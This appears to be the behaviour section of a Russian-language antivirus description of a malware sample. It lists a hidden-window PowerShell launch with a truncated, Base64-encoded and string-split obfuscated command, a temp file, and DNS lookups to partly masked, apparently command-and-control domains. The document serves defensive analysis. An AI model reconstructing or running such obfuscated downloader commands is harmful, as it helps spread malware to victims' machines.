Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAGcAbABwAG8ANgA3AD0AKAAoACcATgAnACsAJwBsADkAJwApACsAKAAnADkAXwAnACsAJwA4AHQAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1357988.cvr
- DNS ASK vu###itue.com
- DNS ASK in####istemas.com
- DNS ASK lb####putacion.com
- DNS ASK in###ar2020.com
- DNS ASK ie####ovations.com
- DNS ASK jo###pper.com
- DNS ASK ma####bernabe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAGcAbABwAG8ANgA3AD0AKAAoACcATgAnACsAJwBsADkAJwApACsAKAAnADkAXwAnACsAJwA4AHQAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG...' (со скрытым окном)